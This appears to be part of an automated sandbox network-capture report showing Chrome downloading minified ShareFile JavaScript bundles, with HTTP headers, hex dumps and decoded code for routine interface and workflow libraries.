                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC12792INData Raw: 3a 69 2e 68 61 73 4c 6f 61 64 65 64 4e 61 6d 65 73 70 61 63 65 2e 62 69 6e 64 28 69 29 7d 2c 69 2e 74 72 61 6e 73 6c 61 74 6f 72 3d 6e 65 77 20 4b 28 69 2e 73 65 72 76 69 63 65 73 2c 69 2e 6f 70 74 69 6f 6e 73 29 2c 69 2e 74 72 61 6e 73 6c 61 74 6f 72 2e 6f 6e 28 22 2a 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 72 3d 6e 65 77 20 41 72 72 61 79 28 74 3e 31 3f 74 2d 31 3a 30 29 2c 6e 3d 31 3b 6e 3c 74 3b 6e 2b 2b 29 72 5b 6e 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 69 2e 65 6d 69 74 2e 61 70 70 6c 79 28 69 2c 5b 65 5d 2e 63 6f 6e 63 61 74 28 72 29 29 7d 29 29 2c 69 2e 69 6e 69 74 28 6f 2c 6e 29 2c 69 2e 74 72 61 6e 73 6c 61 74 6f 72 2e 6f 70 74 69 6f 6e 73 3d 69 2e
                                                                                                                                                                                                                                                                                Data Ascii: :i.hasLoadedNamespace.bind(i)},i.translator=new K(i.services,i.options),i.translator.on("*",(function(e){for(var t=arguments.length,r=new Array(t>1?t-1:0),n=1;n<t;n++)r[n-1]=arguments[n];i.emit.apply(i,[e].concat(r))})),i.init(o,n),i.translator.options=i.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC12792INData Raw: 63 61 73 65 20 75 3a 63 61 73 65 20 66 3a 63 61 73 65 20 67 3a 63 61 73 65 20 64 3a 63 61 73 65 20 63 3a 72 65 74 75 72 6e 20 65 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 74 7d 7d 63 61 73 65 20 6f 3a 72 65 74 75 72 6e 20 74 7d 7d 7d 72 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 6d 6f 64 75 6c 65 2e 72 65 66 65 72 65 6e 63 65 22 29 7d 2c 36 33 35 31 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 28 37 37 38 37 29 7d 2c 31 32 36 3a 28 65 2c 74 2c 72 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 72 28 33 35 38 29 2e 79 3b 74 2e 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 7c 7c 28 65 3d 31 29 2c 21 72 2e 79 2e 6d 65 74 61 7c 7c 21 72 2e 79 2e 6d 65 74 61 2e 75 72 6c 29 74 68 72 6f 77 20 63 6f 6e 73 6f 6c 65 2e
                                                                                                                                                                                                                                                                                Data Ascii: case u:case f:case g:case d:case c:return e;default:return t}}case o:return t}}}r=Symbol.for("react.module.reference")},6351:(e,t,r)=>{"use strict";r(7787)},126:(e,t,r)=>{const n=r(358).y;t.w=function(e){if(e||(e=1),!r.y.meta||!r.y.meta.url)throw console.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC6396INData Raw: 62 6a 65 63 74 22 21 3d 28 30 2c 6e 2e 41 29 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 40 40 74 6f 50 72 69 6d 69 74 69 76 65 20 6d 75 73 74 20 72 65 74 75 72 6e 20 61 20 70 72 69 6d 69 74 69 76 65 20 76 61 6c 75 65 2e 22 29 7d 72 65 74 75 72 6e 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 3f 53 74 72 69 6e 67 3a 4e 75 6d 62 65 72 29 28 65 29 7d 28 65 2c 22 73 74 72 69 6e 67 22 29 3b 72 65 74 75 72 6e 22 73 79 6d 62 6f 6c 22 3d 3d 28 30 2c 6e 2e 41 29 28 74 29 3f 74 3a 74 2b 22 22 7d 7d 2c 32 32 38 34 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79
                                                                                                                                                                                                                                                                                Data Ascii: bject"!=(0,n.A)(o))return o;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==(0,n.A)(t)?t:t+""}},2284:(e,t,r)=>{"use strict";function n(e){return n="function"==typeof Sy
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC6396INData Raw: 79 70 65 6f 66 20 65 26 26 2d 31 21 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 2e 22 29 26 26 31 3d 3d 3d 70 61 72 73 65 46 6c 6f 61 74 28 65 29 7d 29 28 65 29 26 26 28 65 3d 22 31 30 30 25 22 29 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 2d 31 21 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 25 22 29 7d 28 65 29 3b 72 65 74 75 72 6e 20 65 3d 33 36 30 3d 3d 3d 74 3f 65 3a 4d 61 74 68 2e 6d 69 6e 28 74 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 70 61 72 73 65 46 6c 6f 61 74 28 65 29 29 29 2c 72 26 26 28 65 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2a 74 29 2c 31 30 29 2f 31 30 30 29 2c 4d 61 74 68 2e 61 62 73 28 65 2d 74 29 3c 31 65 2d 36 3f 31 3a 65 3d 33 36 30 3d 3d 3d
                                                                                                                                                                                                                                                                                Data Ascii: ypeof e&&-1!==e.indexOf(".")&&1===parseFloat(e)})(e)&&(e="100%");var r=function(e){return"string"==typeof e&&-1!==e.indexOf("%")}(e);return e=360===t?e:Math.min(t,Math.max(0,parseFloat(e))),r&&(e=parseInt(String(e*t),10)/100),Math.abs(e-t)<1e-6?1:e=360===
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC6396INData Raw: 61 63 69 74 79 3a 2e 36 35 7d 2c 7b 69 6e 64 65 78 3a 35 2c 6f 70 61 63 69 74 79 3a 2e 38 35 7d 2c 7b 69 6e 64 65 78 3a 34 2c 6f 70 61 63 69 74 79 3a 2e 39 7d 2c 7b 69 6e 64 65 78 3a 33 2c 6f 70 61 63 69 74 79 3a 2e 39 35 7d 2c 7b 69 6e 64 65 78 3a 32 2c 6f 70 61 63 69 74 79 3a 2e 39 37 7d 2c 7b 69 6e 64 65 78 3a 31 2c 6f 70 61 63 69 74 79 3a 2e 39 38 7d 5d 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 65 3d 79 28 65 2c 32 35 35 29 2c 74 3d 79 28 74 2c 32 35 35 29 2c 72 3d 79 28 72 2c 32 35 35 29 3b 76 61 72 20 6e 3d 4d 61 74 68 2e 6d 61 78 28 65 2c 74 2c 72 29 2c 6f 3d 4d 61 74 68 2e 6d 69 6e 28 65 2c 74 2c 72 29 2c 69 3d 30 2c 61 3d 6e 2c 73 3d 6e 2d 6f 2c 63 3d 30 3d 3d 3d 6e 3f 30 3a 73
                                                                                                                                                                                                                                                                                Data Ascii: acity:.65},{index:5,opacity:.85},{index:4,opacity:.9},{index:3,opacity:.95},{index:2,opacity:.97},{index:1,opacity:.98}];function M(e){var t=function(e,t,r){e=y(e,255),t=y(t,255),r=y(r,255);var n=Math.max(e,t,r),o=Math.min(e,t,r),i=0,a=n,s=n-o,c=0===n?0:s


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                22192.168.2.64974313.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC601OUTGET /sharefile-web/sharefiledev-workflows-pilet/0.119.14/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC612INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 1420749
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 02 Oct 2024 19:19:48 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "1d059a1e91899cad205e8515bea97d44"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 cdcb559c2f25d8ad2ccf0419bee33b02.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: E0nzsVEN2N7MgbidRxlKaVSZTv25k95vX8cXMQG5XPe6lKPfoVb3-A==
                                                                                                                                                                                                                                                                                Age: 45971
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 77 6f 72 6b 66 6c 6f 77 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 2c 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 6c 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevworkflowspilet,{})System.register(["react","antd","react-dom","tslib","@citrite/sf-api","react-router-dom","@sharefiledev/antd-config","react-router"],(function(e,t){var n={},r={},o={},i={},a={},s={},l={},c={};retu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2e 6b 65 79 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 72 65 74 75 72 6e 28 75 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72
                                                                                                                                                                                                                                                                                Data Ascii: ble=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}function c(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function u(){return(u=Object.assign||function(e){for(var t=1;t<ar
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 2b 22 62 6f 78 2d 22 2b 6c 28 65 2c 22 2d 67 72 6f 77 22 2c 22 22 29 2b 50 2b 65 2b 7a 2b 6c 28 65 2c 22 67 72 6f 77 22 2c 22 70 6f 73 69 74 69 76 65 22 29 2b 65 3b 63 61 73 65 20 34 35 35 34 3a 72 65 74 75 72 6e 20 50 2b 6c 28 65 2c 2f 28 5b 5e 2d 5d 29 28 74 72 61 6e 73 66 6f 72 6d 29 2f 67 2c 22 24 31 22 2b 50 2b 22 24 32 22 29 2b 65 3b 63 61 73 65 20 36 31 38 37 3a 72 65 74 75 72 6e 20 6c 28 6c 28 6c 28 65 2c 2f 28 7a 6f 6f 6d 2d 7c 67 72 61 62 29 2f 2c 50 2b 22 24 31 22 29 2c 2f 28 69 6d 61 67 65 2d 73 65 74 29 2f 2c 50 2b 22 24 31 22 29 2c 65 2c 22 22 29 2b 65 3b 63 61 73 65 20 35 34 39 35 3a 63 61 73 65 20 33 39 35 39 3a 72 65 74 75 72 6e 20 6c 28 65 2c 2f 28 69 6d 61 67 65 2d 73 65 74 5c 28 5b 5e 5d 2a 29 2f 2c 50 2b 22 24 31 24 60 24 31 22 29 3b
                                                                                                                                                                                                                                                                                Data Ascii: +"box-"+l(e,"-grow","")+P+e+z+l(e,"grow","positive")+e;case 4554:return P+l(e,/([^-])(transform)/g,"$1"+P+"$2")+e;case 6187:return l(l(l(e,/(zoom-|grab)/,P+"$1"),/(image-set)/,P+"$1"),e,"")+e;case 5495:case 3959:return l(e,/(image-set\([^]*)/,P+"$1$`$1");
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC15156INData Raw: 75 6e 64 65 66 69 6e 65 64 26 26 79 2e 70 75 73 68 28 22 6c 61 62 65 6c 3a 22 2b 6e 2b 22 3b 22 29 2c 6e 75 6c 6c 3d 3d 67 5b 30 5d 7c 7c 67 5b 30 5d 2e 72 61 77 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 79 2e 70 75 73 68 2e 61 70 70 6c 79 28 79 2c 67 29 3b 65 6c 73 65 7b 30 2c 79 2e 70 75 73 68 28 67 5b 30 5d 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 77 3d 67 2e 6c 65 6e 67 74 68 2c 62 3d 31 3b 62 3c 77 3b 62 2b 2b 29 79 2e 70 75 73 68 28 67 5b 62 5d 2c 67 5b 30 5d 5b 62 5d 29 7d 76 61 72 20 4d 3d 28 30 2c 61 2e 77 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6f 3d 76 26 26 65 2e 61 73 7c 7c 75 2c 63 3d 22 22 2c 68 3d 5b 5d 2c 67 3d 65 3b 69 66 28 6e 75 6c 6c 3d 3d 65 2e 74 68 65 6d 65 29 7b 66 6f 72 28 76 61 72 20 5f 20 69 6e 20 67 3d
                                                                                                                                                                                                                                                                                Data Ascii: undefined&&y.push("label:"+n+";"),null==g[0]||g[0].raw===undefined)y.push.apply(y,g);else{0,y.push(g[0][0]);for(var w=g.length,b=1;b<w;b++)y.push(g[b],g[0][b])}var M=(0,a.w)((function(e,t,n){var o=v&&e.as||u,c="",h=[],g=e;if(null==e.theme){for(var _ in g=
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC12792INData Raw: 6f 72 65 20 69 74 73 20 64 65 63 6c 61 72 61 74 69 6f 6e 22 2c 74 72 69 67 67 65 72 5f 76 61 72 69 61 62 6c 65 73 3a 7b 6e 61 6d 65 5f 63 6c 61 73 68 3a 22 54 68 65 72 65 27 73 20 61 6c 72 65 61 64 79 20 61 20 76 61 72 69 61 62 6c 65 20 77 69 74 68 20 74 68 69 73 20 6e 61 6d 65 22 2c 6e 61 6d 65 5f 72 65 71 75 69 72 65 64 3a 22 56 61 72 69 61 62 6c 65 20 6e 61 6d 65 20 69 73 20 61 20 72 65 71 75 69 72 65 64 20 66 69 65 6c 64 22 7d 2c 75 6e 65 78 70 65 63 74 65 64 5f 61 72 72 61 79 5f 74 79 70 65 3a 22 52 65 63 65 69 76 65 64 20 75 6e 65 78 70 65 63 74 65 64 20 7b 7b 41 72 72 61 79 7d 7d 20 74 79 70 65 22 2c 75 6e 6b 6e 6f 77 6e 3a 22 75 6e 6b 6e 6f 77 6e 22 7d 7d 7d 2c 7b 6b 65 79 3a 22 65 73 22 2c 63 6f 6e 74 65 6e 74 3a 7b 65 72 72 6f 72 73 3a 7b 61 72
                                                                                                                                                                                                                                                                                Data Ascii: ore its declaration",trigger_variables:{name_clash:"There's already a variable with this name",name_required:"Variable name is a required field"},unexpected_array_type:"Received unexpected {{Array}} type",unknown:"unknown"}}},{key:"es",content:{errors:{ar
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 69 73 2e 70 75 73 68 28 7b 74 79 70 65 3a 22 54 65 6d 70 6c 61 74 65 45 6c 65 6d 65 6e 74 22 2c 76 61 6c 75 65 3a 7b 72 61 77 3a 6f 2c 63 6f 6f 6b 65 64 3a 72 7d 2c 74 61 69 6c 3a 69 7d 29 3b 66 6f 72 28 3b 74 68 69 73 2e 69 6e 64 65 78 3c 61 3b 29 7b 6c 65 74 20 61 3d 74 68 69 73 2e 65 78 70 72 2e 63 68 61 72 41 74 28 2b 2b 74 68 69 73 2e 69 6e 64 65 78 29 3b 69 66 28 22 60 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 64 65 78 2b 3d 31 2c 69 3d 21 30 2c 73 28 29 2c 65 2e 6e 6f 64 65 3d 6e 2c 74 26 26 28 65 2e 6e 6f 64 65 3d 74 68 69 73 2e 67 6f 62 62 6c 65 54 6f 6b 65 6e 50 72 6f 70 65 72 74 79 28 65 2e 6e 6f 64 65 29 29 2c 65 2e 6e 6f 64 65 3b 69 66 28 22 24 22 3d 3d 3d 61 26 26 22 7b 22 3d 3d 3d 74 68 69 73 2e 65 78 70 72 2e 63 68 61 72
                                                                                                                                                                                                                                                                                Data Ascii: is.push({type:"TemplateElement",value:{raw:o,cooked:r},tail:i});for(;this.index<a;){let a=this.expr.charAt(++this.index);if("`"===a)return this.index+=1,i=!0,s(),e.node=n,t&&(e.node=this.gobbleTokenProperty(e.node)),e.node;if("$"===a&&"{"===this.expr.char
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC2804INData Raw: 2e 54 72 69 67 67 65 72 3d 22 74 72 69 67 67 65 72 22 2c 65 2e 43 6f 6e 6e 65 63 74 69 6f 6e 3d 22 63 6f 6e 6e 65 63 74 69 6f 6e 22 2c 65 2e 54 79 70 65 3d 22 74 79 70 65 22 7d 28 78 65 7c 7c 28 78 65 3d 7b 7d 29 29 3b 63 6f 6e 73 74 20 45 65 3d 6e 65 77 20 53 65 74 28 5b 22 53 68 61 72 65 46 69 6c 65 46 6f 6c 64 65 72 22 2c 22 50 61 72 61 6d 65 74 65 72 22 2c 22 54 49 6e 70 75 74 73 22 2c 22 44 6f 63 75 6d 65 6e 74 54 65 6d 70 6c 61 74 65 22 2c 22 4d 65 72 67 65 46 69 65 6c 64 22 2c 22 55 72 6c 22 5d 29 3b 76 61 72 20 4c 65 2c 53 65 2c 43 65 2c 44 65 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 6c 69 74 65 72 61 6c 3d 22 6c 69 74 65 72 61 6c 22 2c 65 2e 73 79 6d 62 6f 6c 3d 22 73 79 6d 62 6f 6c 22 2c 65 2e 65 78 70 72 65 73 73 69 6f 6e 3d 22 65 78 70
                                                                                                                                                                                                                                                                                Data Ascii: .Trigger="trigger",e.Connection="connection",e.Type="type"}(xe||(xe={}));const Ee=new Set(["ShareFileFolder","Parameter","TInputs","DocumentTemplate","MergeField","Url"]);var Le,Se,Ce,De;!function(e){e.literal="literal",e.symbol="symbol",e.expression="exp
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC12792INData Raw: 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6f 28 65 2e 76 61 6c 75 65 29 3a 28 74 3d 65 2e 76 61 6c 75 65 2c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 6e 3f 74 3a 6e 65 77 20 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 74 29 7d 29 29 29 2e 74 68 65 6e 28 61 2c 73 29 7d 6c 28 28 72 3d 72 2e 61 70 70 6c 79 28 65 2c 74 7c 7c 5b 5d 29 29 2e 6e 65 78 74 28 29 29 7d 29 29 7d 3b 63 6f 6e 73 74 20 7a 65 3d 28 65 2c 74 2c 6e 29 3d 3e 52 65 28 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 63 6f 6e 73 74 20 72 3d 4e 65 28 7b 69 64 3a 22 43 6f 6e 74 65 78 74 22 2c 61 63 74 69 6f 6e 48 61 6e 64 6c 65 3a 75 6e 64 65 66 69 6e 65 64 2c 70 72 69 6d 6f 67 65 6e 69 74 6f 72 3a 22 43 6f 6e 74 65 78 74 22 2c 6c 69 6e 65
                                                                                                                                                                                                                                                                                Data Ascii: var t;e.done?o(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(a,s)}l((r=r.apply(e,t||[])).next())}))};const ze=(e,t,n)=>Re(void 0,void 0,void 0,(function*(){const r=Ne({id:"Context",actionHandle:undefined,primogenitor:"Context",line
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC12792INData Raw: 72 61 79 28 65 29 3f 65 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 32 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 26 26 6e 2e 73 6f 6d 65 28 28 65 3d 3e 22 6e 61 6d 65 22 3d 3d 3d 65 29 29 26 26 6e 2e 73 6f 6d 65 28 28 65 3d 3e 22 76 61 6c 75 65 22 3d 3d 3d 65 29 29 7c 7c 28 74 3d 21 31 29 7d 29 29 3a 74 3d 21 31 2c 74 7d 2c 6f 74 3d 65 3d 3e 65 2e 74 79 70 65 3d 3d 3d 43 65 2e 41 63 74 69 6f 6e 41 72 67 75 6d 65 6e 74 3f 65 3a 65 2e 70 61 72 65 6e 74 3f 6f 74 28 65 2e 70 61 72 65 6e 74 29 3a 6e 75 6c 6c 2c 69 74 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 75 6e 64 65 66 69 6e 65 64 3b 6c 65 74 20 6e 3d 74 2e 61 72 67 73 2e 66 69 6e 64 28 28 74 3d 3e 74 2e 68 61 6e 64 6c 65 2e
                                                                                                                                                                                                                                                                                Data Ascii: ray(e)?e.forEach((e=>{const n=Object.keys(e);2===n.length&&n.some((e=>"name"===e))&&n.some((e=>"value"===e))||(t=!1)})):t=!1,t},ot=e=>e.type===Ce.ActionArgument?e:e.parent?ot(e.parent):null,it=(e,t)=>{if(!t)return undefined;let n=t.args.find((t=>t.handle.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC6396INData Raw: 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 7d 63 6f 6e 73 74 20 48 74 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 63 6c 61 73 73 20 50 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 5f 6b 65 79 73 3d 5b 5d 2c 74 68 69 73 2e 5f 6b 65 79 4d 61 70 3d 7b 7d 3b 6c 65 74 20 74 3d 30 3b 65 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 6c 65 74 20 6e 3d 46 74 28 65 29 3b 74 68 69 73 2e 5f 6b 65 79 73 2e 70 75 73 68 28 6e 29 2c 74 68 69 73 2e 5f 6b 65 79 4d 61 70 5b 6e 2e 69 64 5d 3d 6e 2c 74 2b 3d 6e 2e 77 65 69 67 68 74 7d 29 29 2c 74 68 69 73 2e 5f 6b 65 79 73 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 77 65 69 67 68 74 2f 3d 74 7d 29 29 7d 67 65 74 28 65
                                                                                                                                                                                                                                                                                Data Ascii: rototype.toString.call(e)}const Ht=Object.prototype.hasOwnProperty;class Pt{constructor(e){this._keys=[],this._keyMap={};let t=0;e.forEach((e=>{let n=Ft(e);this._keys.push(n),this._keyMap[n.id]=n,t+=n.weight})),this._keys.forEach((e=>{e.weight/=t}))}get(e


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                23192.168.2.64974213.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC596OUTGET /sharefile-web/sharefiledev-esign-pilet/1.218.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 775322
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 25 Sep 2024 06:18:48 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 07:37:41 GMT
                                                                                                                                                                                                                                                                                ETag: "ed5aeea53278040b2022dea269dc2b98"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 d8eef512ab23f23f549b4cd25ac5328c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: xME24XSEkf8ME3v8EAy7SwnUIDM4yUwf-cRsreKP-4HniRzc-2jePA==
                                                                                                                                                                                                                                                                                Age: 37652
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
